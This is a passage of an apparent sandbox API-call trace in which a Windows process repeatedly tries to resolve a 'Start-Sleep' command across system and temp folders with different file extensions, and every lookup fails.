lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpFilePart=0x0) returned 0x34 [0264.347] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.347] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.348] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.WSH", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.348] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.348] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.349] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x1a [0264.349] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0264.349] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.349] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.350] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.MSC", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.350] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.350] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.350] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x1a [0264.350] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0264.351] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.351] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.352] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.CPL", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.352] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.352] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0264.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.352] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0264.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep", lpFilePart=0x0) returned 0x16 [0264.352] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0264.352] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.353] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.353] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.354] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x28 [0264.354] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0264.354] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.355] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.355] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.ps1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x29 [0264.356] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0264.356] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.356] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.357] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psm1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.358] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x29 [0264.358] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0264.358] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.358] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.359] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.psd1", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.COM", lpFilePart=0x0) returned 0x28 [0264.360] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0264.360] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.360] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.361] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.COM", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.362] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x28 [0264.362] GetFullPathNameW (in: lpFileName="Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x34 [0264.362] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0264.362] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b81e160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0264.363] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.EXE", lpFindFileData=0x1b81e420 | out: lpFindFileData=0x1b81e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0264.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e7a0) returned 1 [0264.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e740) returned 1 [0264.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e750) returned 1 [0264.363] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x1b81e830 | out: lpFileInformation=0x1b81e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0264.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e710) returned 1 [0264.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e780) returned 1 [0264.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b81e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0264.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x28 [0264.364] GetFullPathNameW (in: lpFileName="Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b81e210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x34 [0264.364] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b81e1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 